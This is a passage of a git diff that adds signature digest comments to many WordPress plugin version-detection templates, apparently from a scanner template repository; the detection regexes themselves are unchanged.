4b0a00483046022100f79d80995db6965679132f3a23e9a8f695e2e1c18c25cce7228bb2b1c09fb58e022100f51fd9c5d9ba5f5e7201f534905c1d8e548496c4fe6d630183e6c0a5d7a76d8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..54f042484e 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fd8e76bd5617d84f3502f6ac7815fab1e39c37687ab025d892b59ce673906835022064133d244213939c5625d1dec77653e9f9d8f6021f66f7486c4ec1cd80f24c97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..1fc751f705 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b5f1c77ef13a385bc28cee8af8e00ae9c33a49e0430bb71720e0b839e7ff8014022043f525cf3898db19182533b40a58d0e3698beba763ad10c473570ee4939a2663:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..067a30a6c0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100db93cf4f7b08826526eead1909a331f24020750d437a7a4c066d2feabe8d512202202c9c81deb9660bec15e13a4a971986c13dcf3505d02c5cf978c36266cb3e463a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..c9c7c50e0e 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022070d05ccf6940451889643784d927a77d34cef205ead893e6b9817e7c45b34d4a0220237941e2039e0dbea473b6008f9fbcc05a51a960b8decf33a80893d18aa82913:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..2dd426bf49 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c1809dc3e025ca50eaeda558b173ca1a764260e743be1b6a728dcff4832ec7c602201941a8b9f8f9bf32556ebbd50f5f9e6693913c9f42d7d48d2143acfdcead30ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..7941b86c58 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022052b60931c608372def382afe0964ca0f24e38822d5498eb1ace116ac06c5164502207020f7d804aca4a814b43a0f4d194db2c6271d47aad242ae0493555d54e4deca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..09f529170d 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022075c81a4fe0fc3ca6b97744561027a628511e80c01f096897fb6ab7191ae6dd2c022100c34e6d2585971faf6d426e5e6e6b06302b80d4db5320acd9cf3d450412f52573:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..b80bec5e3b 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220426afcdba5dd87b288748ba663cf003e03147cd92cea9ddfecaeddc62fd4b9c302204a0206fbabbe28a63b2a4c1abfa6b0e18d5697a0ffc62181705b290dc86ef7fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..e158397bf0 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220423ab9e90cf0d2f89a4386353f5e8aed67a62256d51b9d73214463fdd69cd773022100cba8e0559576a306776cae42976df51346b0ab2af608e3d6c10213778655c8a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..a31a8a698b 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201d2dfa8258c5b2234d969644becf45a97a0ba5428be95cf2688ebcd3723b2b35022026d96cf2e8858b0749cffb3ff0917b371a3048518b89222c0459204450b30e8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..768d9a5749 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cc6a83ee0bb71da2794523b3ce00d9490ed49f545f307701c7ac37c82cd3506602206f9214837d85abc86ad559af8a84dc3abbb76fe4c8d66fae8930148ac73d1f76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..ae870795bb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d7b1e1d7d108fec3c216247495edb64d6f6a8bee5f037d7c54fb2207a24f695f022100bef83542490e195ec34be98d93ce7777ea09e9a7889ee153a5393491e4010ec3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..dd54b0e8c2 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022043146fe92f14ee35cd7af0839e5373a17b4be4b81cf670abde584c9c43f6c264022051a77df97500808cb72cef7ec653422bb64d98ba5997cd34e534f77e55eba413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..dd1e562889 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220361581e309563bca4dfef6d7d87f52b12c77ad3ded38f91f0576b3077c52ebd102210097efe1b3e4f8b05f31cd9ecada5973d595e858ae32a9f5f4c45e20977eeff49c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..7bfc391471 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009495268f12358b8f6ae8fcf49d4d88d0d1f8526a70632c72514a493c531ed65e0221009776b770a16885a51dcf51029c680064e52a42fb258793266c06794a335f5690:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..1606fa0745 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210084ffc7eff5f8b1641a544ab3062f2c2a388a3e8e599fc07b0c896a8fcb6861bc0220422a54a183d1ec92b7d11c6a376bf9c9c108e1bfeb1393807c3f848fbb7d820c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..c46adc6ea8 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e3acccc9e2923cac460c70172579994e98a07ed6ab7997b96137536cf99acfa502207af8e1772729160320dda9b47dba2ca7cfe1c6d739107bbe1e40dea0d44ece66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389d..44122f19ea 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b59c895808ff011880898cfb1d0aefbb7ce785dd26d738a49adbf828bead19d10220275691897e351685c727cc62ae021ea98c8f116c31c21eab5fd9205b17c879b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..5243e096dd 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008c4cb7f129d58607615f202011fa392f30118f38c336b43133e1f0ed3908403402205b5a2f8e597e944232fb509f0956d6a1c10468a838e0caf158c5cecf42551d92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..c8dfc5b2cb 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a4f2b7fd5b40cf5ca0dde8cf7199ab2431ac6b61e21165fbf9e68db3e09b1c47022100ac7efd9945ee2a06afa369496779ae31e9041c34d5d622afac0bdc47a5537982:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..5095f1d4b1 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009fb8dc318cfa27e36518785dfe3a630b1280bd98b3ba4d9b8a32cc2823a8466602201093c64ac68873374c55247ed3130b7eda9dbd272ec28140ed4476a36ce764e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..c7d9f9522d 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206b65266613bf84a9ed3c0f83699fa33afe4b70a37b2d99cd1459564d3053f85302210093ea100d25288cefaeff64446fefa259566375cb1bb3462ccea788e588c38c20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..bf1b62c3dc 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220067b96f4458acecff5eb082259fa98b1785f879fc53ebd7c6121e1930596d609022100c2e625feeede1149f315009fcb451c978e7c9d8aa5feec55f639bebc73a94ad8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..ff2c18af8f 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a504b03aa73fc34d3cc61184fa05a8115e83073a15c9d39050f76fa9eaa9a517022100a72bea1d389d9d7c1b296e3f37525183a9a55bcc1f4902053b2eaf226cd5436f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..830fcaa75c 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009372e73fcf6cd7d2d271ef2a752fabe279562d99ba38f6a17e48b630bd7b2b6602204f9267eb754db40375f83ecc3c12c10f0ab0e8ac9148133a6c205148a3a871d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..677a7c873f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008f5f47eac8cc35be7c366ac03d68820bc76c0352e303fe3ecc7befcb7e44846c022100982102ef12aad6072858f99b3d771408abcfdb7415a6933ab9d300468e37bbee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..263c8ac24b 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203c06be7048aef37f005165ab9bb9b52109e4ddc46b425e3bb7e2c8d5af01952b022100a6f519a8cc256d5980d6eb4e005e488fa1e1222b1116da18aa1bc7454f28c320:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..5c870ec790 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e1c73277b4be33dc27071c9ed9b3fa70bab489663ff9bed90f6b806d9c5d21f0022100a3f60ad81e2f9ffc37024aa1674579f58c76e46b452168ce2f2f2d12eda18f49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..86a9642602 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ffd196219e173d57ce9cb32861fa08bdcec47fbc5ba7620fd439f2b220f85c1d022100e53300e4240602a5f73c8d3254395a3f2de8b3d3e7d1674864767da5ab541fd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..91d52dc882 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022032e7ba50a883da7ce744993f904513a02122f0ac13aca322f4fe253c54e3a761022100d34558b23334af0571cc5e6355cb9af7c0180361dd3e409b5d04addd396f16a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..b8b6c2bad4 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203df3b747e106640dfb96fdba8cf0f683d2d874cc60b2a112d7fdda2392c3be98022100c49fb86d5c345aad058b8d6fedfaca12b74bb9dd1011f2c0baff4b091bea9f75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..c7df69fc70 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202c720db7232fd5f1d9f506d30b6e58960c286d1becd6dac3418630da0a9bf9580221008e21018406790e6e0f4197dc4027348cc3c36c93d3ceaba4b8f6158eba1cff0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..ebce78520d 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022060cbec6f1ab02e1f621f3b3bd1e6b83ed5044c225714f9cf132573b63c240a470221009efadca739a50edd25fcffa9d3757ca04fe0ce1bd6052576ee57b0529632a7bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..95bd8300b6 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207c2fda4b3ef0544135be10d45abd2c2c2536cac66ade358738fc387b34a5f841022027bfc92b5969f3834c36d234ceb8a4453c107a1ad1b7d2b619ce534661f4c315:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..79d9e47d03 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008082af722902c3c395120c5a6746499a40c5e8da19074d2824e90f44918f2124022100964508e1c2b5f29e4c918999a677e5aaceea4305036324c83c8429b05e2dd1ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..ae2014096c 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022005fc857171f9e83bead934205ceb194f0346201fb43489450b32196de80902d80221009fa08450aa917b2a5c1c2a1be4749a3bba3a5217ef4f42ede02a3ab6cf01a9b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..4dc7a37288 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202a555eadbdb8d5a25106dc22f90308173ada2ff6eb8d0d0d21f0c2747a5dfaff02207a97c5f74c2851bb9e4a3821782bce01d5bde1cac3dfd2ff415ad53a872bd52d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..5ca8a63844 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100acdfadc2f5f7c97fa024ecff42de444897f2d0487afa82123f3635d393dcda71022100a708d1114100df26cbb8793878b2f6ea3a731855026d867df835fdf2837c7a98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..0aa33d5493 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220086b0e66fc182a06bda67273362670980072addce444e44476be5b039db2cada02206a386a9b33bb5db4427cf2213cff4e80479f97e29c74cb63e9353c01e10362ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..be78beb97a 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e681cf1524b0e794b31235614d9403f3fa4f6c45cc0f04f69b3348ee838794dc022100b73da47a272449a3399f283a062aa9950939279722fdf59d0715d06e19c8f562:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..227e9dc4ff 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d6facfa239f7275df14040cd535d3b65a525d5ec32e67fcbfd27c84a0f863fd8022100fa9d8552f49c41de715152f988cf79437ab9a2934bad7309220d306538e64bac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..118c2a3980 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201b48cda2b471dc7ca1c0cad7faaa778341356043bb23ee1eb9abfa73f0a8677102204c1c15d828ef92db7c640543da97cb952668e2974e3206685d3ecce294419d66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..cb088b34b9 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022062f4a31a34869d15ba99462a93b9ed396e8d910b793cd344d37f53d923673da202207a4a5aa3d6b1816985af74e3b4bb83b34ad0a5adc1de357263177ac85451a3db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..4bbbcc3cc1 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008be7ec1f76ec8b9789b553c8095d969f669fa380fefe00f436109740e7892278022032af71904b947381e5ad50e3b6e2a9a96ec0b22abf4aee5a978299ba6f598a31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..5d78628266 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210080847aadf823df098e23cc9853a34c91a3d1c51963ecb8755be5386ec4803e2402207d29fb536a5ace29764dc6ac1bf4c59a4a7700ebc2f71033f49a97b46e37a814:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..0f12f27e58 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e08b129aa58fdecc90ca23da6fd1d3f2e0243dd53ac8633bfd622f29d4c68fe10221009bc5a18f48cc9ffcbf09fbbc94b8132dcddc26ee3b123ca6aa4e0259a97ad893:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..7d50c88bfa 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 